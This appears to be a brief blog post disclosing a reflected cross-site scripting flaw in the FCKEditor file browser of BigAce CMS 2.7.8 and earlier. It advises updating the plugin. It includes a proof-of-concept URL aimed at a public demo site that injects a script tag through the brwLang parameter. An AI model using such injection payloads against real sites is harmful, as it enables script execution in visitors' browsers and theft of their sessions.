BigAce <= 2.7.8 FCKEditor XSS vulnerability

I was looking for a CMS and i found this one that seems really good but after 10 minutes I found a XSS vulnerability in the FCKEditor plugin.

Update FCKEditor…

 

bigace

LIVE DEMO:

h**p://demo.opensourcecms.com/bigace/addon/FCKeditor/editor/filemanager/browser/bigace/browser.php?brwLang=%3C/script%3E%27%3Cscript%3Ealert%2812345%29%3C/script%3E

 

 

Advertisements

Leave a Reply

Fill in your details below or click an icon to log in:

WordPress.com Logo

You are commenting using your WordPress.com account. Log Out / Change )

Twitter picture

You are commenting using your Twitter account. Log Out / Change )

Facebook photo

You are commenting using your Facebook account. Log Out / Change )

Google+ photo

You are commenting using your Google+ account. Log Out / Change )

Connecting to %s